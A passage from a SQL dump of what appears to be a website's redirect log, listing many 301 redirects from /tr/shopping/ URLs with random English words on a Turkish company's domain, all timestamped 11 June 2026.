00:00:00',301),(78779,'https://3s-technologies.com.tr/tr/shopping/geusdism/3163870277.html',NULL,'https://3s-technologies.com.tr/shopping/geusdism/3163870277.html','',1,0,'2026-06-11 21:47:16','0000-00-00 00:00:00',301),(78780,'https://3s-technologies.com.tr/tr/shopping/disthrone/4016234394.html',NULL,'https://3s-technologies.com.tr/shopping/disthrone/4016234394.html','',1,0,'2026-06-11 21:47:21','0000-00-00 00:00:00',301),(78781,'https://3s-technologies.com.tr/tr/shopping/conjugal/2800856078.html',NULL,'https://3s-technologies.com.tr/shopping/conjugal/2800856078.html','',1,0,'2026-06-11 21:47:26','0000-00-00 00:00:00',301),(78782,'https://3s-technologies.com.tr/tr/shopping/adelantado/2708413354.html',NULL,'https://3s-technologies.com.tr/shopping/adelantado/2708413354.html','',1,0,'2026-06-11 21:47:31','0000-00-00 00:00:00',301),(78783,'https://3s-technologies.com.tr/tr/shopping/crosseyed/2844696155.html',NULL,'https://3s-technologies.com.tr/shopping/crosseyed/2844696155.html','',1,0,'2026-06-11 21:47:36','0000-00-00 00:00:00',301),(78784,'https://3s-technologies.com.tr/tr/shopping/rimator/1547223889.html',NULL,'https://3s-technologies.com.tr/shopping/rimator/1547223889.html','',1,0,'2026-06-11 21:47:41','0000-00-00 00:00:00',301),(78785,'https://3s-technologies.com.tr/tr/shopping/sastra/3692203868.html',NULL,'https://3s-technologies.com.tr/shopping/sastra/3692203868.html','',1,0,'2026-06-11 21:47:48','0000-00-00 00:00:00',301),(78786,'https://3s-technologies.com.tr/tr/shopping/stayless/1008243565.html',NULL,'https://3s-technologies.com.tr/shopping/stayless/1008243565.html','',1,0,'2026-06-11 21:47:50','0000-00-00 00:00:00',301),(78787,'https://3s-technologies.com.tr/tr/shopping/souke/3140682727.html',NULL,'https://3s-technologies.com.tr/shopping/souke/3140682727.html','',1,0,'2026-06-11 21:47:53','0000-00-00 00:00:00',301),(78788,'https://3s-technologies.com.tr/tr/shopping/dishfuls/3027587492.html',NULL,'https://3s-technologies.com.tr/shopping/dishfuls/3027587492.html','',1,0,'2026-06-11 21:47:56','0000-00-00 00:00:00',301),(78789,'https://3s-technologies.com.tr/tr/shopping/cadels/1309845710.html',NULL,'https://3s-technologies.com.tr/shopping/cadels/1309845710.html','',1,0,'2026-06-11 21:47:59','0000-00-00 00:00:00',301),(78790,'https://3s-technologies.com.tr/tr/shopping/undertenant/3743413538.html',NULL,'https://3s-technologies.com.tr/shopping/undertenant/3743413538.html','',1,0,'2026-06-11 21:48:02','0000-00-00 00:00:00',301),(78791,'https://3s-technologies.com.tr/tr/shopping/lowing/2414205112.html',NULL,'https://3s-technologies.com.tr/shopping/lowing/2414205112.html','',1,0,'2026-06-11 21:48:09','0000-00-00 00:00:00',301),(78792,'https://3s-technologies.com.tr/tr/shopping/campagnol/1003249692.html',NULL,'https://3s-technologies.com.tr/shopping/campagnol/1003249692.html','',1,0,'2026-06-11 21:48:11','0000-00-00 00:00:00',301),(78793,'https://3s-technologies.com.tr/tr/shopping/lipotyphla/3677075346.html',NULL,'https://3s-technologies.com.tr/shopping/lipotyphla/3677075346.html','',1,0,'2026-06-11 21:48:14','0000-00-00 00:00:00',301),(78794,'https://3s-technologies.com.tr/tr/shopping/laticostate/1323575716.html',NULL,'https://3s-technologies.com.tr/shopping/laticostate/1323575716.html','',1,0,'2026-06-11 21:48:17','0000-00-00 00:00:00',301),(78795,'https://3s-technologies.com.tr/tr/shopping/tentfuls/2856413829.html',NULL,'https://3s-technologies.com.tr/shopping/tentfuls/2856413829.html','',1,0,'2026-06-11 21:48:20','0000-00-00 00:00:00',301),(78796,'https://3s-technologies.com.tr/tr/shopping/retractible/887989867.html',NULL,'https://3s-technologies.com.tr/shopping/retractible/887989867.html','',1,0,'2026-06-11 21:48:23','0000-00-00 00:00:00',301),(78797,'https://3s-technologies.com.tr/tr/shopping/pelecaniformes/1838793717.html',NULL,'https://3s-technologies.com.tr/shopping/pelecaniformes/1838793717.html','',1,0,'2026-06-11 21:48:26','0000-00-00 00:00:00',301),(78798,'https://3s-technologies.com.tr/tr/shopping/fillip/1318823421.html',NULL,'https://3s-technologies.com.tr/shopping/fillip/1318823421.html','',1,0,'2026-06-11 21:48:29','0000-00-00 00:00:00',301),(78799,'https://3s-technologies.com.tr/tr/shopping/namtar/1304579785.html',NULL,'https://3s-technologies.com.tr/shopping/namtar/1304579785.html','',1,0,'2026-06-11 21:48:33','0000-00-00 00:00:00',301),(78800,'https://3s-technologies.com.tr/tr/shopping/marteline/1728882087.html',NULL,'https://3s-technologies.com.tr/shopping/marteline/1728882087.html','',1,0,'2026-06-11 21:48:36','0000-00-00 00:00:00',301),(78801,'https://3s-technologies.com.tr/tr/shopping/emprosthotonos/1483997131.html',NULL,'https://3s-technologies.com.tr/shopping/emprosthotonos/1483997131.html','',1,0,'2026-06-11 21:48:39','0000-00-00 00:00:00',301),(78802,'https://3s-technologies.com.tr/tr/shopping/amyloplastic/1763114426.html',NULL,'https://3s-technologies.com.tr/shopping/amyloplastic/1763114426.html','',1,0,'2026-06-11 21:48:44','0000-00-00 00:00:00',301),(78803,'https://3s-technologies.com.tr/tr/shopping/dechristianize/2684652479.html',NULL,'https://3s-technologies.com.tr/shopping/dechristianize/2684652479.html','',1,0,'2026-06-11 21:48:47','0000-00-00 00:00:00',301),(78804,'https://3s-technologies.com.tr/tr/shopping/egocentrism/2254026074.html',NULL,'https://3s-technologies.com.tr/shopping/egocentrism/2254026074.html','',1,0,'2026-06-11 21:48:49','0000-00-00 00:00:00',301),(78805,'https://3s-technologies.com.tr/tr/shopping/spoilable/1399811117.html',NULL,'https://3s-technologies.com.tr/shopping/spoilable/1399811117.html','',1,0,'2026-06-11 21:48:52','0000-00-00 00:00:00',301),(78806,'https://3s-technologies.com.tr/tr/shopping/splanchnopleure/2833619244.html',NULL,'https://3s-technologies.com.tr/shopping/splanchnopleure/2833619244.html','',1,0,'2026-06-11 21:48:55','0000-00-00 00:00:00',301),(78807,'https://3s-technologies.com.tr/tr/shopping/eponymist/2598605050.html',NULL,'https://3s-technologies.com.tr/shopping/eponymist/2598605050.html','',1,0,'2026-06-11 21:48:58','0000-00-00 00:00:00',301),(78808,'https://3s-technologies.com.tr/tr/shopping/dipogon/2354796470.html',NULL,'https://3s-technologies.com.tr/shopping/dipogon/2354796470.html','',1,0,'2026-06-11 21:49:01','0000-00-00 00:00:00',301),(78809,'https://3s-technologies.com.tr/tr/shopping/redolent/1330063855.html',NULL,'https://3s-technologies.com.tr/shopping/redolent/1330063855.html','',1,0,'2026-06-11 21:49:06','0000-00-00 00:00:00',301),(78810,'https://3s-technologies.com.tr/tr/shopping/umbrageousness/3921824443.html',NULL,'https://3s-technologies.com.tr/shopping/umbrageousness/3921824443.html','',1,0,'2026-06-11 21:49:09','0000-00-00 00:00:00',301),(78811,'https://3s-technologies.com.tr/tr/shopping/overhent/240646557.html',NULL,'https://3s-technologies.com.tr/shopping/overhent/240646557.html','',1,0,'2026-06-11 21:49:12','0000-00-00 00:00:00',301),(78812,'https://3s-technologies.com.tr/tr/shopping/outfight/3066183170.html',NULL,'https://3s-technologies.com.tr/shopping/outfight/3066183170.html','',1,0,'2026-06-11 21:49:15','0000-00-00 00:00:00',301),(78813,'https://3s-technologies.com.tr/tr/shopping/menaccanite/1560335481.html',NULL,'https://3s-technologies.com.tr/shopping/menaccanite/1560335481.html','',1,0,'2026-06-11 21:49:18','0000-00-00 00:00:00',301),(78814,'https://3s-technologies.com.tr/tr/shopping/elegy/593051342.html',NULL,'https://3s-technologies.com.tr/shopping/elegy/593051342.html','',1,0,'2026-06-11 21:49:21','0000-00-00 00:00:00',301),(78815,'https://3s-technologies.com.tr/tr/shopping/diversiloba/4139312020.html',NULL,'https://3s-technologies.com.tr/shopping/diversiloba/4139312020.html','',1,0,'2026-06-11 21:49:24','0000-00-00 00:00:00',301),(78816,'https://3s-technologies.com.tr/tr/shopping/lunifrons/605161981.html',NULL,'https://3s-technologies.com.tr/shopping/lunifrons/605161981.html','',1,0,'2026-06-11 21:49:27','0000-00-00 00:00:00',301),(78817,'https://3s-technologies.com.tr/tr/shopping/languished/1832992846.html',NULL,'https://3s-technologies.com.tr/shopping/languished/1832992846.html','',1,0,'2026-06-11 21:49:34','0000-00-00 00:00:00',301),(78818,'https://3s-technologies.com.tr/tr/shopping/nectaried/966618739.html',NULL,'https://3s-technologies.com.tr/shopping/nectaried/966618739.html','',1,0,'2026-06-11 21:49:36','0000-00-00 00:00:00',301),(78819,'https://3s-technologies.com.tr/tr/shopping/masai/495631581.html',NULL,'https://3s-technologies.com.tr/shopping/masai/495631581.html','',1,0,'2026-06-11 21:49:40','0000-00-00 00:00:00',301),(78820,'https://3s-technologies.com.tr/tr/shopping/zerumbet/3994734194.html',NULL,'https://3s-technologies.com.tr/shopping/zerumbet/3994734194.html','',1,0,'2026-06-11 21:49:42','0000-00-00 00:00:00',301),(78821,'https://3s-technologies.com.tr/tr/shopping/footpad/156496356.html',NULL,'https://3s-technologies.com.tr/shopping/footpad/156496356.html','',1,0,'2026-06-11 21:49:45','0000-00-00 00:00:00',301),(78822,'https://3s-technologies.com.tr/tr/shopping/frothily/3492624353.html',NULL,'https://3s-technologies.com.tr/shopping/frothily/3492624353.html','',1,0,'2026-06-11 21:49:48','0000-00-00 00:00:00',301),(78823,'https://3s-technologies.com.tr/tr/shopping/financial/922349900.html',NULL,'https://3s-technologies.com.tr/shopping/financial/922349900.html','',1,0,'2026-06-11 21:49:52','0000-00-00 00:00:00',301),(78824,'https://3s-technologies.com.tr/tr/shopping/odontolcae/2437920595.html',NULL,'https://3s-technologies.com.tr/shopping/odontolcae/2437920595.html','',1,0,'2026-06-11 21:49:56','0000-00-00 00:00:00',301),(78825,'https://3s-technologies.com.tr/tr/shopping/grapheme/455724287.html',NULL,'https://3s-technologies.com.tr/shopping/grapheme/455724287.html','',1,0,'2026-06-11 21:49:58','0000-00-00 00:00:00',301),(78826,'https://3s-technologies.com.tr/tr/shopping/britisher/963242066.html',NULL,'https://3s-technologies.com.tr/shopping/britisher/963242066.html','',1,0,'2026-06-11 21:50:02','0000-00-00 00:00:00',301),(78827,'https://3s-technologies.com.tr/tr/shopping/cephalotrocha/3173966536.html',NULL,'https://3s-technologies.com.tr/shopping/cephalotrocha/3173966536.html','',1,0,'2026-06-11 21:50:05','0000-00-00 00:00:00',301),(78828,'https://3s-technologies.com.tr/tr/shopping/wispen/926938688.html',NULL,'https://3s-technologies.com.tr/shopping/wispen/926938688.html','',1,0,'2026-06-11 21:50:08','0000-00-00 00:00:00',301),(78829,'https://3s-technologies.com.tr/tr/shopping/gulleting/2259990484.html',NULL,'https://3s-technologies.com.tr/shopping/gulleting/2259990484.html','',1,0,'2026-06-11 21:50:10','0000-00-00 00:00:00',301),(78830,'https://3s-technologies.com.tr/tr/shopping/piffero/2348995599.html',NULL,'https://3s-technologies.com.tr/shopping/piffero/2348995599.html','',1,0,'2026-06-11 21:50:14','0000-00-00 00:00:00',301),(78831,'https://3s-technologies.com.tr/tr/shopping/reunite/4047126402.html',NULL,'https://3s-technologies.com.tr/shopping/reunite/4047126402.html','',1,0,'2026-06-11 21:50:20','0000-00-00 00:00:00',301),(78832,'https://3s-technologies.com.tr/tr/shopping/inedible/106528346.html',NULL,'https://3s-technologies.com.tr/shopping/inedible/106528346.html','',1,0,'2026-06-11 21:50:23','0000-00-00 00:00:00',301),(78833,'https://3s-technologies.com.tr/tr/shopping/sultriest/514362257.html',NULL,'https://3s-technologies.com.tr/shopping/sultriest/514362257.html','',1,0,'2026-06-11 21:50:26','0000-00-00 00:00:00',301),(78834,'https://3s-technologies.com.tr/tr/shopping/unlaid/1078034394.html',NULL,'https://3s-technologies.com.tr/shopping/unlaid/1078034394.html','',1,0,'2026-06-11 21:50:29','0000-00-00 00:00:00',301),(78835,'https://3s-technologies.com.tr/tr/shopping/progenitorship/3276648257.html',NULL,'https://3s-technologies.com.tr/shopping/progenitorship/3276648257.html','',1,0,'2026-06-11 21:50:32','0000-00-00 00:00:00',301),(78836,'https://3s-technologies.com.tr/tr/shopping/transcribbler/1695791378.html',NULL,'https://3s-technologies.com.tr/shopping/transcribbler/1695791378.html','',1,0,'2026-06-11 21:50:35','0000-00-00 00:00:00',301),(78837,'https://3s-technologies.com.tr/tr/shopping/scummed/11165904.html',NULL,'https://3s-technologies.com.tr/shopping/scummed/11165904.html','',1,0,'2026-06-11 21:50:38','0000-00-00 00:00:00',301),(78838,'https://3s-technologies.com.tr/tr/shopping/alimonious/1769078836.html',NULL,'https://3s-technologies.com.tr/shopping/alimonious/1769078836.html','',1,0,'2026-06-11 21:50:45','0000-00-00 00:00:00',301),(78839,'https://3s-technologies.com.tr/tr/shopping/charterhouse/3581940099.html',NULL,'https://3s-technologies.com.tr/shopping/charterhouse/3581940099.html','',1,0,'2026-06-11 21:50:47','0000-00-00 00:00:00',301),(78840,'https://3s-technologies.com.tr/tr/shopping/kingdomed/1160726687.html',NULL,'https://3s-technologies.com.tr/shopping/kingdomed/1160726687.html','',1,0,'2026-06-11 21:50:50','0000-00-00 00:00:00',301),(78841,'https://3s-technologies.com.tr/tr/shopping/incarnata/1339111538.html',NULL,'https://3s-technologies.com.tr/shopping/incarnata/1339111538.html','',1,0,'2026-06-11 21:50:53','0000-00-00 00:00:00',301),(78842,'https://3s-technologies.com.tr/tr/shopping/orthodontics/1485704782.html',NULL,'https://3s-technologies.com.tr/shopping/orthodontics/1485704782.html','',1,0,'2026-06-11 21:50:56','0000-00-00 00:00:00',301),(78843,'https://3s-technologies.com.tr/tr/shopping/foremeant/2479103978.html',NULL,'https://3s-technologies.com.tr/shopping/foremeant/2479103978.html','',1,0,'2026-06-11 21:50:59','0000-00-00 00:00:00',301),(78844,'https://3s-technologies.com.tr/tr/shopping/hunters/1804134302.html',NULL,'https://3s-technologies.com.tr/shopping/hunters/1804134302.html','',1,0,'2026-06-11 21:51:02','0000-00-00 00:00:00',301),(78845,'https://3s-technologies.com.tr/tr/shopping/redeyed/2324889350.html',NULL,'https://3s-technologies.com.tr/shopping/redeyed/2324889350.html','',1,0,'2026-06-11 21:51:07','0000-00-00 00:00:00',301),(78846,'https://3s-technologies.com.tr/tr/shopping/brachygrapher/3469861361.html',NULL,'https://3s-technologies.com.tr/shopping/brachygrapher/3469861361.html','',1,0,'2026-06-11 21:51:09','0000-00-00 00:00:00',301),(78847,'https://3s-technologies.com.tr/tr/shopping/meatoscope/1880191300.html',NULL,'https://3s-technologies.com.tr/shopping/meatoscope/1880191300.html','',1,0,'2026-06-11 21:51:12','0000-00-00 00:00:00',301),(78848,'https://3s-technologies.com.tr/tr/shopping/snowberry/1361119354.html',NULL,'https://3s-technologies.com.tr/shopping/snowberry/1361119354.html','',1,0,'2026-06-11 21:51:15','0000-00-00 00:00:00',301),(78849,'https://3s-technologies.com.tr/tr/shopping/antenuptial/3115328566.html',NULL,'https://3s-technologies.com.tr/shopping/antenuptial/3115328566.html','',1,0,'2026-06-11 21:51:18','0000-00-00 00:00:00',301),(78850,'https://3s-technologies.com.tr/tr/shopping/geneva/2445784340.html',NULL,'https://3s-technologies.com.tr/shopping/geneva/2445784340.html','',1,0,'2026-06-11 21:51:21','0000-00-00 00:00:00',301),(78851,'https://3s-technologies.com.tr/tr/shopping/knockings/1767703230.html',NULL,'https://3s-technologies.com.tr/shopping/knockings/1767703230.html','',1,0,'2026-06-11 21:51:24','0000-00-00 00:00:00',301),(78852,'https://3s-technologies.com.tr/tr/shopping/twisty/1275034005.html',NULL,'https://3s-technologies.com.tr/shopping/twisty/1275034005.html','',1,0,'2026-06-11 21:51:30','0000-00-00 00:00:00',301),(78853,'https://3s-technologies.com.tr/tr/shopping/volunteered/852211888.html',NULL,'https://3s-technologies.com.tr/shopping/volunteered/852211888.html','',1,0,'2026-06-11 21:51:35','0000-00-00 00:00:00',301),(78854,'https://3s-technologies.com.tr/tr/shopping/sealbrown/2236671036.html',NULL,'https://3s-technologies.com.tr/shopping/sealbrown/2236671036.html','',1,0,'2026-06-11 21:51:47','0000-00-00 00:00:00',301),(78855,'https://3s-technologies.com.tr/tr/shopping/chairmanship/4193668953.html',NULL,'https://3s-technologies.com.tr/shopping/chairmanship/4193668953.html','',1,0,'2026-06-11 21:51:49','0000-00-00 00:00:00',301),(78856,'https://3s-technologies.com.tr/tr/shopping/unpeace/2839420115.html',NULL,'https://3s-technologies.com.tr/shopping/unpeace/2839420115.html','',1,0,'2026-06-11 21:51:52','0000-00-00 00:00:00',301),(78857,'https://3s-technologies.com.tr/tr/shopping/tetradactyl/2472480509.html',NULL,'https://3s-technologies.com.tr/shopping/tetradactyl/2472480509.html','',1,0,'2026-06-11 21:51:55','0000-00-00 00:00:00',301),(78858,'https://3s-technologies.com.tr/tr/shopping/euharmonic/2419171623.html',NULL,'https://3s-technologies.com.tr/shopping/euharmonic/2419171623.html','',1,0,'2026-06-11 21:51:58','0000-00-00 00:00:00',301),(78859,'https://3s-technologies.com.tr/tr/shopping/sauropsida/1862113197.html',NULL,'https://3s-technologies.com.tr/shopping/sauropsida/1862113197.html','',1,0,'2026-06-11 21:52:01','0000-00-00 00:00:00',301),(78860,'https://3s-technologies.com.tr/tr/shopping/independents/2989844788.html',NULL,'https://3s-technologies.com.tr/shopping/independents/2989844788.html','',1,0,'2026-06-11 21:52:04','0000-00-00 00:00:00',301),(78861,'https://3s-technologies.com.tr/tr/shopping/ptyalism/1777991157.html',NULL,'https://3s-technologies.com.tr/shopping/ptyalism/1777991157.html','',1,0,'2026-06-11 21:52:10','0000-00-00 00:00:00',301),(78862,'https://3s-technologies.com.tr/tr/shopping/vicargeneral/1832333771.html',NULL,'https://3s-technologies.com.tr/shopping/vicargeneral/1832333771.html','',1,0,'2026-06-11 21:52:13','0000-00-00 00:00:00',301),(78863,'https://3s-technologies.com.tr/tr/shopping/sarcobatus/3100451851.html',NULL,'https://3s-technologies.com.tr/shopping/sarcobatus/3100451851.html','',1,0,'2026-06-11 21:52:16','0000-00-00 00:00:00',301),(78864,'https://3s-technologies.com.tr/tr/shopping/kneecrooking/1496257980.html',NULL,'https://3s-technologies.com.tr/shopping/kneecrooking/1496257980.html','',1,0,'2026-06-11 21:52:19','0000-00-00 00:00:00',301),(78865,'https://3s-technologies.com.tr/tr/shopping/corruptress/1085047380.html',NULL,'https://3s-technologies.com.tr/shopping/corruptress/1085047380.html','',1,0,'2026-06-11 21:52:22','0000-00-00 00:00:00',301),(78866,'https://3s-technologies.com.tr/tr/shopping/crepance/3398313919.html',NULL,'https://3s-technologies.com.tr/shopping/crepance/3398313919.html','',1,0,'2026-06-11 21:52:25','0000-00-00 00:00:00',301),(78867,'https://3s-technologies.com.tr/tr/shopping/diversiloba/1655884068.html',NULL,'https://3s-technologies.com.tr/shopping/diversiloba/1655884068.html','',1,0,'2026-06-11 21:52:28','0000-00-00 00:00:00',301),(78868,'https://3s-technologies.com.tr/tr/shopping/scutage/4109169206.html',NULL,'https://3s-technologies.com.tr/shopping/scutage/4109169206.html','',1,0,'2026-06-11 21:52:33','0000-00-00 00:00:00',301),(78869,'https://3s-technologies.com.tr/tr/shopping/sanicle/1316658831.html',NULL,'https://3s-technologies.com.tr/shopping/sanicle/1316658831.html','',1,0,'2026-06-11 21:52:36','0000-00-00 00:00:00',301),(78870,'https://3s-technologies.com.tr/tr/shopping/audiovisual/1814080351.html',NULL,'https://3s-technologies.com.tr/shopping/audiovisual/1814080351.html','',1,0,'2026-06-11 21:52:39','0000-00-00 00:00:00',301),(78871,'https://3s-technologies.com.tr/tr/shopping/renegation/1816244941.html',NULL,'https://3s-technologies.com.tr/shopping/renegation/1816244941.html','',1,0,'2026-06-11 21:53:13','0000-00-00 00:00:00',301),(78872,'https://3s-technologies.com.tr/tr/shopping/anaphor/1570725156.html',NULL,'https://3s-technologies.com.tr/shopping/anaphor/1570725156.html','',1,0,'2026-06-11 21:53:15','0000-00-00 00:00:00',301),(78873,'https://3s-technologies.com.tr/tr/shopping/dextrotartaric/3755866055.html',NULL,'https://3s-technologies.com.tr/shopping/dextrotartaric/3755866055.html','',1,0,'2026-06-11 21:53:18','0000-00-00 00:00:00',301),(78874,'https://3s-technologies.com.tr/tr/shopping/ironish/595475524.html',NULL,'https://3s-technologies.com.tr/shopping/ironish/595475524.html','',1,0,'2026-06-11 21:53:21','0000-00-00 00:00:00',301),(78875,'https://3s-technologies.com.tr/tr/shopping/myrmecocystus/1367579316.html',NULL,'https://3s-technologies.com.tr/shopping/myrmecocystus/1367579316.html','',1,0,'2026-06-11 21:53:24','0000-00-00 00:00:00',301),(78876,'https://3s-technologies.com.tr/tr/shopping/alimentariness/757076657.html',NULL,'https://3s-technologies.com.tr/shopping/alimentariness/757076657.html','',1,0,'2026-06-11 21:53:27','0000-00-00 00:00:00',301),(78877,'https://3s-technologies.com.tr/tr/shopping/creance/3759746054.html',NULL,'https://3s-technologies.com.tr/shopping/creance/3759746054.html','',1,0,'2026-06-11 21:53:30','0000-00-00 00:00:00',301),(78878,'https://3s-technologies.com.tr/tr/shopping/banderilla/2014145972.html',NULL,'https://3s-technologies.com.tr/shopping/banderilla/2014145972.html','',1,0,'2026-06-11 21:53:34','0000-00-00 00:00:00',301),(78879,'https://3s-technologies.com.tr/tr/shopping/droplet/1491669176.html',NULL,'https://3s-technologies.com.tr/shopping/droplet/1491669176.html','',1,0,'2026-06-11 21:53:37','0000-00-00 00:00:00',301),(78880,'https://3s-technologies.com.tr/tr/shopping/pulverulent/1245568312.html',NULL,'https://3s-technologies.com.tr/shopping/pulverulent/1245568312.html','',1,0,'2026-06-11 21:53:40','0000-00-00 00:00:00',301),(78881,'https://3s-technologies.com.tr/tr/shopping/cabineting/3839748894.html',NULL,'https://3s-technologies.com.tr/shopping/cabineting/3839748894.html','',1,0,'2026-06-11 21:53:43','0000-00-00 00:00:00',301),(78882,'https://3s-technologies.com.tr/tr/shopping/cynocrambe/3811053873.html',NULL,'https://3s-technologies.com.tr/shopping/cynocrambe/3811053873.html','',1,0,'2026-06-11 21:53:46','0000-00-00 00:00:00',301),(78883,'https://3s-technologies.com.tr/tr/shopping/decretorily/1313022518.html',NULL,'https://3s-technologies.com.tr/shopping/decretorily/1313022518.html','',1,0,'2026-06-11 21:53:49','0000-00-00 00:00:00',301),(78884,'https://3s-technologies.com.tr/tr/shopping/calochortus/3902911948.html',NULL,'https://3s-technologies.com.tr/shopping/calochortus/3902911948.html','',1,0,'2026-06-11 21:53:52','0000-00-00 00:00:00',301),(78885,'https://3s-technologies.com.tr/tr/shopping/bellyacher/1591355183.html',NULL,'https://3s-technologies.com.tr/shopping/bellyacher/1591355183.html','',1,0,'2026-06-11 21:54:05','0000-00-00 00:00:00',301),(78886,'https://3s-technologies.com.tr/tr/shopping/foliomort/2380885490.html',NULL,'https://3s-technologies.com.tr/shopping/foliomort/2380885490.html','',1,0,'2026-06-11 21:54:08','0000-00-00 00:00:00',301),(78887,'https://3s-technologies.com.tr/tr/shopping/pastorate/2455439172.html',NULL,'https://3s-technologies.com.tr/shopping/pastorate/2455439172.html','',1,0,'2026-06-11 21:54:11','0000-00-00 00:00:00',301),(78888,'https://3s-technologies.com.tr/tr/shopping/wherret/3024999787.html',NULL,'https://3s-technologies.com.tr/shopping/wherret/3024999787.html','',1,0,'2026-06-11 21:54:14','0000-00-00 00:00:00',301),(78889,'https://3s-technologies.com.tr/tr/shopping/policate/1485868305.html',NULL,'https://3s-technologies.com.tr/shopping/policate/1485868305.html','',1,0,'2026-06-11 21:54:17','0000-00-00 00:00:00',301),(78890,'https://3s-technologies.com.tr/tr/shopping/bywash/2302094765.html',NULL,'https://3s-technologies.com.tr/shopping/bywash/2302094765.html','',1,0,'2026-06-11 21:54:20','0000-00-00 00:00:00',301),(78891,'https://3s-technologies.com.tr/tr/shopping/protestantly/3004289363.html',NULL,'https://3s-technologies.com.tr/shopping/protestantly/3004289363.html','',1,0,'2026-06-11 21:54:39','0000-00-00 00:00:00',301),(78892,'https://3s-technologies.com.tr/tr/shopping/nitrol/578583248.html',NULL,'https://3s-technologies.com.tr/shopping/nitrol/578583248.html','',1,0,'2026-06-11 21:54:43','0000-00-00 00:00:00',301),(78893,'https://3s-technologies.com.tr/tr/shopping/oscitantly/1657447332.html',NULL,'https://3s-technologies.com.tr/shopping/oscitantly/1657447332.html','',1,0,'2026-06-11 21:54:50','0000-00-00 00:00:00',301),(78894,'https://3s-technologies.com.tr/tr/shopping/conciseness/445291941.html',NULL,'https://3s-technologies.com.tr/shopping/conciseness/445291941.html','',1,0,'2026-06-11 21:54:53','0000-00-00 00:00:00',301),(78895,'https://3s-technologies.com.tr/tr/shopping/ranula/2934638186.html',NULL,'https://3s-technologies.com.tr/shopping/ranula/2934638186.html','',1,0,'2026-06-11 21:54:58','0000-00-00 00:00:00',301),(78896,'https://3s-technologies.com.tr/tr/shopping/overpay/100372717.html',NULL,'https://3s-technologies.com.tr/shopping/overpay/100372717.html','',1,0,'2026-06-11 21:55:30','0000-00-00 00:00:00',301),(78897,'https://3s-technologies.com.tr/tr/shopping/severance/2789924094.html',NULL,'https://3s-technologies.com.tr/shopping/severance/2789924094.html','',1,0,'2026-06-11 21:56:07','0000-00-00 00:00:00',301),(78898,'https://3s-technologies.com.tr/tr/shopping/satisfiable/4007918714.html',NULL,'https://3s-technologies.com.tr/shopping/satisfiable/4007918714.html','',1,0,'2026-06-11 21:56:53','0000-00-00 00:00:00',301),(78899,'https://3s-technologies.com.tr/tr/shopping/carjack/2375857255.html',NULL,'https://3s-technologies.com.tr/shopping/carjack/2375857255.html','',1,0,'2026-06-11 21:57:07','0000-00-00 00:00:00',301),(78900,'https://3s-technologies.com.tr/tr/shopping/disenter/94269493.html',NULL,'https://3s-technologies.com.tr/shopping/disenter/94269493.html','',1,0,'2026-06-11 21:57:23','0000-00-00 00:00:00',301),(78901,'https://3s-technologies.com.tr/tr/shopping/superethical/3216175338.html',NULL,'https://3s-technologies.com.tr/shopping/superethical/3216175338.html','',1,0,'2026-06-11 21:58:03','0000-00-00 00:00:00',301),(78902,'https://3s-technologies.com.tr/tr/shopping/prattling/203735389.html',NULL,'https://3s-technologies.com.tr/shopping/prattling/203735389.html','',1,0,'2026-06-11 21:58:07','0000-00-00 00:00:00',301),(78903,'https://3s-technologies.com.tr/tr/shopping/camtshatica/3766966180.html',NULL,'https://3s-technologies.com.tr/shopping/camtshatica/3766966180.html','',1,0,'2026-06-11 21:58:22','0000-00-00 00:00:00',301),(78904,'https://3s-technologies.com.tr/tr/shopping/bewilderedness/4160262168.html',NULL,'https://3s-technologies.com.tr/shopping/bewilderedness/4160262168.html','',1,0,'2026-06-11 21:58:49','0000-00-00 00:00:00',301),(78905,'https://3s-technologies.com.tr/tr/shopping/allotropical/4034006233.html',NULL,'https://3s-technologies.com.tr/shopping/allotropical/4034006233.html','',1,0,'2026-06-11 21:58:53','0000-00-00 00:00:00',301),(78906,'https://3s-technologies.com.tr/tr/shopping/shears/2501907533.html',NULL,'https://3s-technologies.com.tr/shopping/shears/2501907533.html','',1,0,'2026-06-11 21:59:10','0000-00-00 00:00:00',301),(78907,'https://3s-technologies.com.tr/tr/shopping/anabasis/2363657489.html',NULL,'https://3s-technologies.com.tr/shopping/anabasis/2363657489.html','',1,0,'2026-06-11 21:59:25','0000-00-00 00:00:00',301),(78908,'https://3s-technologies.com.tr/tr/shopping/dasypodidae/4254499674.html',NULL,'https://3s-technologies.com.tr/shopping/dasypodidae/4254499674.html','',1,0,'2026-06-11 21:59:44','0000-00-00 00:00:00',301),(78909,'https://3s-technologies.com.tr/tr/shopping/thornless/3392370259.html',NULL,'https://3s-technologies.com.tr/shopping/thornless/3392370259.html','',1,0,'2026-06-11 22:00:26','0000-00-00 00:00:00',301),(78910,'https://3s-technologies.com.tr/tr/shopping/achromatinic/1749477955.html',NULL,'https://3s-technologies.com.tr/shopping/achromatinic/1749477955.html','',1,0,'2026-06-11 22:00:52','0000-00-00 00:00:00',301),(78911,'https://3s-technologies.com.tr/tr/shopping/auxins/1175821050.html',NULL,'https://3s-technologies.com.tr/shopping/auxins/1175821050.html','',1,0,'2026-06-11 22:00:59','0000-00-00 00:00:00',301),(78912,'https://3s-technologies.com.tr/tr/shopping/demonology/3623123482.html',NULL,'https://3s-technologies.com.tr/shopping/demonology/3623123482.html','',1,0,'2026-06-11 22:01:12','0000-00-00 00:00:00',301),(78913,'https://3s-technologies.com.tr/tr/shopping/tirailleur/3409030640.html',NULL,'https://3s-technologies.com.tr/shopping/tirailleur/3409030640.html','',1,0,'2026-06-11 22:01:39','0000-00-00 00:00:00',301),(78914,'https://3s-technologies.com.tr/tr/shopping/horseweed/2514975508.html',NULL,'https://3s-technologies.com.tr/shopping/horseweed/2514975508.html','',1,0,'2026-06-11 22:02:00','0000-00-00 00:00:00',301),(78915,'https://3s-technologies.com.tr/tr/shopping/cheslip/2607782642.html',NULL,'https://3s-technologies.com.tr/shopping/cheslip/2607782642.html','',1,0,'2026-06-11 22:02:06','0000-00-00 00:00:00',301),(78916,'https://3s-technologies.com.tr/tr/shopping/zetetic/2607946149.html',NULL,'https://3s-technologies.com.tr/shopping/zetetic/2607946149.html','',1,0,'2026-06-11 22:02:24','0000-00-00 00:00:00',301),(78917,'https://3s-technologies.com.tr/tr/shopping/unmeasurable/1086259479.html',NULL,'https://3s-technologies.com.tr/shopping/unmeasurable/1086259479.html','',1,0,'2026-06-11 22:02:43','0000-00-00 00:00:00',301),(78918,'https://3s-technologies.com.tr/tr/shopping/associate/2610189736.html',NULL,'https://3s-technologies.com.tr/shopping/associate/2610189736.html','',1,0,'2026-06-11 22:03:41','0000-00-00 